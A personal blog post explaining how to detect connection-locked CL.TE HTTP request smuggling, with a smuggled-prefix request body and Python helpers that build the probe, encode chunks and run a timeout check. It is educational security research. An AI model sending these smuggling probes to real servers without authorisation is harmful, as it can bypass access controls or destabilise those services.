I’ve spent the majority of the days since watching James Kettle’s talk rewatching it, reading the paper and supporting materials, and hacking away at the Python code.

I’ve learned that HTTP Desync attacks are highly complex, and they pose a number of challenges. On the other hand, they are incredibly powerful and versatile, and this kind of bug changes the way the Internet actually works. I think they’re going to become a hot topic very shortly, and for good reason.

I’ve decided to blog the journey of developing attacks, exploits and the tool (Synch0le) to help others learn what I learn and also to clarify my own thought processes. If you want to get into these kinds of bugs, follow along, but be warned: I still debug with print statements.

Traditional or “classical” server-side HTTP Desync attacks usually attempt to poison the connection between the frontend server and the backend, in the hope that the frontend reuses the same backend connection for other users’ requests as well as ours. Because our traffic sits right next to theirs on that connection, de-synchronising the request boundaries lets us start modifying other people’s traffic.

However, these days it’s common for the frontend to create a fresh connection to the backend for each connection established with the client, which means we can’t alter other people’s traffic. Such servers are connection-locked. As it turns out though, many powerful attacks can still be conducted, such as bypassing access restrictions (403, 401), leaking secrets/tokens from internal headers, leaking internal hostnames and much more.

Let’s break down Connection-Locked CL.TE Desync.

We understand the concept of a Desync (servers get confused about where request boundaries are) and we will assume we’re approaching a connection-locked server. What does “CL.TE” stand for?

The naming scheme for Desync vectors is generally “frontend header.backend header”, where each half names the header that server uses to decide where the request body ends. In this case, CL.TE means the frontend is using the Content-Length header and NOT Transfer-Encoding, and the backend is using the Transfer-Encoding header and NOT Content-Length.



Remember that CL and TE are different ways of specifying the same information: where the request body ends. The HTTP/1.1 specification says a sender must not include both, and that a server receiving both should let Transfer-Encoding override Content-Length and treat the message as a possible smuggling attempt. For the attack to work, the frontend has to honour only Content-Length and the backend only Transfer-Encoding. If either of them rejects the ambiguous request instead, you get a 400 Bad Request, which will often happen during your testing. This 400 is the correct, secure way to handle such a request.

So, our first request to this server will be a POST. Remember we are poisoning connections here, so we need the server to honour a Connection: keep-alive header. Because we are testing for CL.TE, we set Content-Length to the correct value, since we want the frontend to forward the whole request without issue. We also set Transfer-Encoding to chunked, and this is what our body will look like:

    0\r\n
    \r\n
    GET /hopefully404 HTTP/1.1\r\n
    Foo: bar

If you’re not familiar with chunked encoding, it’s simple. Each chunk starts with a hex representation of how many bytes are in that chunk. That’s followed by the standard HTTP line ending \r\n, then comes the data, then another \r\n. So if we want to send 50 bytes of data, that’s 32 in hex, so our body looks like this:

    32\r\n
    abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwx\r\n
    0\r\n
    \r\n

Notice the 0\r\n\r\n. That is how you end a chunked request: specify a chunk of 0 bytes, then send the trailing \r\n, and the server knows you’re done. It will hang, though, if you don’t send the trailing \r\n sequence, just like a GET that is missing its final blank line.
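To make the framing concrete, here is a minimal Python sketch of a chunked encoder. The function name `encode_chunked` is my own for illustration and is not taken from Synch0le; it only covers the basic size/data/terminator layout described above, with no chunk extensions or trailers.

```python
def encode_chunked(*chunks: bytes) -> bytes:
    # Each chunk is: <length in hex> CRLF <data> CRLF
    out = b""
    for chunk in chunks:
        if not chunk:
            # A zero-length chunk would terminate the body early, so skip it.
            continue
        out += f"{len(chunk):x}".encode("ascii") + b"\r\n" + chunk + b"\r\n"
    # A zero-length chunk followed by an empty line ends the body.
    return out + b"0\r\n\r\n"


data = b"abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwx"  # 50 bytes
print(encode_chunked(data))
```

Calling `encode_chunked()` with no chunks at all returns just the terminator, which is exactly the sequence the attack body starts with.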

Looking at our attack body with this understanding, it looks strange. We’ve started the body with the ending sequence. This is the chunked way of sending Content-Length: 0, essentially. Because of this, if the backend server is using chunked encoding, it thinks the request body is empty, and that means it will interpret the rest of the body (which is a basic GET request to the endpoint /hopefully404) as the start of the next, separate request.
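Here is a rough sketch of how the whole first request could be assembled as raw bytes. The function name `build_clte_probe`, its parameters and the `example.com` host are placeholders of mine, not Synch0le's actual code. The one thing that matters is that Content-Length is computed from the full body, smuggled prefix included, so a frontend that trusts Content-Length forwards everything.

```python
def build_clte_probe(host: str, path: str = "/",
                     smuggled_path: str = "/hopefully404") -> bytes:
    # Body: chunked terminator first, then the smuggled prefix.
    # The prefix deliberately ends WITHOUT \r\n so the follow-up's
    # request line is absorbed into the Foo header.
    body = (
        b"0\r\n"
        b"\r\n"
        + f"GET {smuggled_path} HTTP/1.1\r\n".encode("ascii")
        + b"Foo: bar"
    )
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: keep-alive\r\n"
        f"Content-Length: {len(body)}\r\n"  # correct length of the whole body
        "Transfer-Encoding: chunked\r\n"
        "\r\n"
    ).encode("ascii")
    return head + body


# example.com is a placeholder host.
print(build_clte_probe("example.com").decode("ascii"))
```

Building the bytes by hand rather than through an HTTP library is deliberate here: most client libraries will refuse to send both headers, or will quietly "fix" the request for you.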

Remember that the request is a lie. It’s all just a stream of bytes down a wire and if servers process messages like this, you can send 1.5 or 2.5 or 99 requests in one. Do not try to bend the spoon; you must become the spoon.

The server won’t respond to that GET request just yet, because we haven’t sent the trailing \r\n sequence. So, after sending this first POST request in our attack, we will get one response back, and the second GET request is half-formed and waiting on the connection for the rest of the packet to come along.

If the server kills the connection and refuses to keep it alive, testing is over for both connection-locked DeSync vectors as well as Client-Side Desync on this target. Maybe it could be vulnerable to traditional Desync attacks, but not this one.

If you get a 400, testing is over for CL.TE on this target. If you get a 5XX, I strongly encourage you to think about how comfortable you are with potentially knocking that server over, or worse, as these attacks can be devastating. A de-sync attack done by James Kettle last year fully de-synchronised every global session in Atlassian’s Jira and logged users into random accounts, so they had to log out every user on Earth to fix it. Any other code (even 405, 404, 403) is acceptable and indicates the server might be vulnerable because it accepted and processed the malformed packet.

Now we need to send a follow-up request. This will complete our half-formed request which is waiting for us. We don’t really want to get a 400 Bad Request from our follow-up if we can help it, because that’s a more ambiguous signal than the desired 404. We can still detect the vulnerability if we get a 400, but it’s less clear what really happened when the backend parsed the follow-up request.

Again, the basic goal is to de-synchronise the connection. So the proof of de-sync we are looking for is that the second request we send does not receive the “expected” response. For example, if we normally get a 200 OK from a GET request to an endpoint, we send that same GET as the second request on our poisoned connection, and if the attack is successful we get a 404, because the server doesn’t know an endpoint called /hopefully404. Thus, the success condition for this payload is a 404. If we change our malicious prefix payload to DELETE /… we might expect a 405 Method Not Allowed. Either way, we are receiving a different response code from a GET that normally returns 200/302/etc. The reason the response changed is that the first request modified the second via de-synchronisation.

Quick observation: the reason we have Foo: bar as the last line of our malicious prefix, with no line ending after it, is that we want the first line of our follow-up request to be concatenated onto the end of this header line, so the server treats it as part of the header value and ignores it. We send our follow-up GET and this is what the backend sees:
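Since the whole signal is "did the status code change?", the comparison itself is tiny. A minimal sketch, assuming you already have the raw response bytes for the baseline and the follow-up; `status_code` and `response_changed` are illustrative names of my own:

```python
def status_code(raw_response: bytes) -> int:
    # The status line looks like: HTTP/1.1 404 Not Found
    status_line = raw_response.split(b"\r\n", 1)[0]
    parts = status_line.split(b" ", 2)
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        raise ValueError(f"not an HTTP status line: {status_line!r}")
    return int(parts[1])


def response_changed(baseline: bytes, follow_up: bytes) -> bool:
    # A differing status code for the same GET is the desync signal.
    return status_code(baseline) != status_code(follow_up)


baseline = b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"
follow_up = b"HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n"
print(status_code(baseline), status_code(follow_up), response_changed(baseline, follow_up))
```

Comparing only status codes is a simplification. If the endpoint returns dynamic content with a stable status, you would need a different marker, but for a /hopefully404 prefix the code is usually enough.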

    GET /hopefully404 HTTP/1.1\r\n
    Foo: barGET / HTTP/1.1\r\n

Naturally, it doesn’t care what’s in this Foo header so it ignores it. This is crucial because all you will get is 400s and unpredictability if you don’t escape the real first line of the follow-up. Instead of Foo: bar you can use X: Y or really any header you think the server will ignore, just don’t end your payload with \r\n.
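You can convince yourself of this with a toy parser. The sketch below is not how any real server parses requests; `parse_request_head` is a deliberately naive helper of mine that splits on line endings and colons, which is enough to show where the follow-up's request line ends up. The `example.com` host is a placeholder.

```python
def parse_request_head(raw: bytes):
    # Everything up to the first blank line is the request head.
    head, _, _rest = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


# What is left waiting on the backend connection after the first request:
leftover = b"GET /hopefully404 HTTP/1.1\r\nFoo: bar"
# Our innocent-looking follow-up:
follow_up = b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"

method, target, headers = parse_request_head(leftover + follow_up)
print(method, target)
print(headers)
```

The parsed target is /hopefully404, the follow-up's request line has become the value of the Foo header, and the follow-up's Host header is reused by the smuggled request.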

So we get a 404 response to our follow-up, the server is vulnerable!

Not quite. It might be vulnerable, or the frontend might be assuming that we are using HTTP pipelining. In short, pipelining is something browsers don’t use, but most servers understand it. With pipelining you send all the requests you want to send back to back without waiting for an answer in between, then at the end you read all your responses, in order. There is no header or character sequence for this, you just send requests like a madman and the server happily obliges, so we need to detect this indirectly.

We need to know for sure that the frontend really is checking and using the Content-Length header. The brilliantly simple answer is to separately test the frontend by sending a request which has a Content-Length header with a value bigger than the actual data we send. If the frontend really is using Content-Length, it will wait for the rest of the data and eventually time out. If we get a quick response without timing out, then the server is probably using pipelining and nothing is vulnerable here.
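A rough sketch of that timeout check with a plain socket follows. The names `build_short_body_request` and `waits_for_body`, the declared length of 10 and the 5 second timeout are all arbitrary choices of mine, and the socket is assumed to be already connected (wrap it with `ssl` first for HTTPS targets).

```python
import socket


def build_short_body_request(host: str, path: str = "/",
                             declared: int = 10, body: bytes = b"x") -> bytes:
    # Declare more bytes than we actually send.
    assert declared > len(body)
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: keep-alive\r\n"
        f"Content-Length: {declared}\r\n"
        "\r\n"
    ).encode("ascii")
    return head + body


def waits_for_body(sock: socket.socket, request: bytes, timeout: float = 5.0) -> bool:
    # True  -> no answer within `timeout`: the peer is still waiting for bytes.
    # False -> we got data back (or the peer closed): Content-Length was not waited on.
    sock.settimeout(timeout)
    sock.sendall(request)
    try:
        sock.recv(4096)
    except socket.timeout:
        return True
    return False


# Usage against a real target (host is a placeholder):
#   sock = socket.create_connection(("example.com", 80))
#   print(waits_for_body(sock, build_short_body_request("example.com")))
```

Pick the timeout with the target in mind. Too short and a slow server looks like a hang; too long and you are holding a connection open for no reason.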

Successfully detecting Connection-Locked CL.TE Desync goes like this:

- Send a GET to the endpoint to get a baseline response

- Send a POST with correct `Content-Length` and also `Transfer-Encoding: chunked`, as well as `Connection: keep-alive`, with the payload shown earlier -> Packet is processed

- Send the same GET as before, on the same connection from step 2, and observe if the response changes or not -> 404

- If it does, get a new connection and send a POST with a `Content-Length` value longer than the actual body and wait for a timeout -> Timeout = the server is vulnerable to CL.TE.
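The steps above can be sketched as a small decision function that is kept separate from the network code, so it is easy to reason about. This is my own illustrative structure (`Observations`, `Verdict` and `assess_clte` are made-up names), not the logic as implemented in Synch0le, and it folds in the earlier rules about dropped connections and 400s.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Optional


class Verdict(Enum):
    CONNECTION_CLOSED = "server closed the connection, cannot test"
    REJECTED = "probe got a 400, CL.TE testing is over"
    NO_DESYNC = "follow-up response did not change"
    NEEDS_TIMEOUT_TEST = "response changed, run the Content-Length timeout test"
    PROBABLY_PIPELINING = "response changed but no timeout, probably pipelining"
    LIKELY_VULNERABLE = "response changed and frontend waited, likely CL.TE"


@dataclass
class Observations:
    baseline_status: int                    # step 1: plain GET
    probe_status: Optional[int]             # step 2: None if the connection died
    follow_up_status: Optional[int] = None  # step 3: same GET, same connection
    timed_out: Optional[bool] = None        # step 4: None if not run yet


def assess_clte(obs: Observations) -> Verdict:
    if obs.probe_status is None or obs.follow_up_status is None:
        return Verdict.CONNECTION_CLOSED
    if obs.probe_status == 400:
        return Verdict.REJECTED
    if obs.follow_up_status == obs.baseline_status:
        return Verdict.NO_DESYNC
    if obs.timed_out is None:
        return Verdict.NEEDS_TIMEOUT_TEST
    return Verdict.LIKELY_VULNERABLE if obs.timed_out else Verdict.PROBABLY_PIPELINING


print(assess_clte(Observations(200, 200, 404, True)))
```

A 5XX on the probe is not treated as a stop condition here, because that one is a judgement call for a human rather than something the code should decide for you.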

It took several days of testing, playing with Burp Suite and developing Synch0le to get a really clear picture of the above, and to understand that I was quite premature to tweet that it supports the above attack: it doesn’t in its current form. After successfully implementing the logic in code and analysing traffic with Wireshark, I discovered that while asyncio makes you feel all warm and fuzzy inside with blistering speed, it will not handle sending invalid packets the way we want. The code for CL.TE will have to be refactored to use scapy instead.

I know what I’ll be doing this weekend!